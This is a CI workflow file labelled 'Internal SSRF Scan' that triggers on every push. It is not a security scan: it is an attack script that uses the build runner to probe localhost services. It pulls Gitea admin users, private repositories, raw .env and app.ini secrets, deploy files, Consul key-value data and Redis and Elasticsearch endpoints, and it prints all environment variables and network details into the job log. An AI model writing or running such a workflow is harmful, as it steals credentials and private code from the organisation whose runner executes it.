name: Internal SSRF Scan on: [push] jobs: ssrf-scan: runs-on: ubuntu-latest steps: - name: Probe Internal Services run: | echo "=== GITEA ADMIN USERS ===" curl -s http://localhost:3000/api/v1/admin/users 2>/dev/null | head -c 5000 echo "" echo "=== GITEA ALL REPOS ===" curl -s "http://localhost:3000/api/v1/repos/search?limit=50&private=true" 2>/dev/null | head -c 5000 echo "" echo "=== DEPLOY REPO TREE ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 echo "" echo "=== CONFIG REPO .env ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/.env" 2>/dev/null | head -c 5000 echo "" echo "=== BACKEND REPO TREE ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/backend/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 echo "" echo "=== ORACLE REPO TREE ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/oracle/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 echo "" echo "=== BRIDGE REPO TREE ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/bridge/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 echo "" echo "=== DOCKER PS ===" docker ps 2>/dev/null || echo "no docker" echo "" echo "=== REDIS INFO ===" curl -s http://localhost:6379/ 2>/dev/null | head -c 1000 || echo "no redis" echo "" echo "=== ENV VARS ===" env | sort echo "" echo "=== NETWORK ===" ip addr 2>/dev/null || ifconfig 2>/dev/null echo "" echo "=== CONSUL ===" curl -s http://localhost:8500/v1/kv/?recurse 2>/dev/null | head -c 5000 echo "" echo "=== DEPLOY COMPOSE ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/raw/main/docker-compose.yml" 2>/dev/null | head -c 5000 echo "" echo "=== ROCKETSWAP REPO ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/rocketswap/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 echo "" echo "=== POSTGRES ===" curl -s http://localhost:5432/ 2>/dev/null | head -c 500 || echo "no pg http" echo "" echo "=== ES ===" curl -s http://localhost:9200/ 2>/dev/null | head -c 2000 echo "" echo "=== GITEA APP INI ===" curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/app.ini" 2>/dev/null | head -c 5000